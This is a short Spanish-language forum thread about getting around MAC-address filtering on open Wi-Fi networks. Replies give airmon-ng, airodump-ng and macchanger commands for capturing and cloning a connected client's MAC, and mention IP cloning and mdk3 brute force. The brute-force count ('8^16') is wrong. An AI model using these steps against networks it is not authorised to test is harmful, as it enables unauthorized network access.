nunca probe si se podia , pero hay redes que no tienen password y al dar conectar no conectan porque tienen filtrado mac, es posible obtener las mac de dichos dispositivos?
http://thehackerway.com/2012/03/28/wireless-hacking-descubriendo-aps-con-ssid-ocultos-y-evadiendo-mac-filters-parte-iv/
Milo_EscorpioNN simple. Dependiendo en que caso sea, router normal por ejemplo, con filtro de MAC Address; solo entran MAC Address Especificas. Simplemente pones tu placa en modo monitor..
airmon-ng start <interfaz>
luego airodumpeamos...
airodump-ng <interfaz>
juntamos los datos de los usuarios que están conectados a esa red, en especial la MAC Address y la clonamos:
ifconfig <interfaz> down
macchanger -m XX:XX:XX:XX:XX:XX <interfaz>
ipconfig <interfaz> up
y te conectas, en cambio si ahora te conectas y es un hotspot, posiblemente simplemente debas clonar la IP también para entrar, no en todos, pero muy posible.
puedes también hacer un brute force sobre las mac aceptadas con mdk3 (8^16 posibilidades)
Se te fue el dedo: No es
Citaripconfig <interfaz> up
pero
ifconfig <interfaz> up ;)
No es necesario cambiar la mac con macchanger, solo tenéis que añadir el argumento -h +mac_que_queremos_clonar a vuestras lineas de comando aireplay-ng y con "hw ether" se modifica la mac.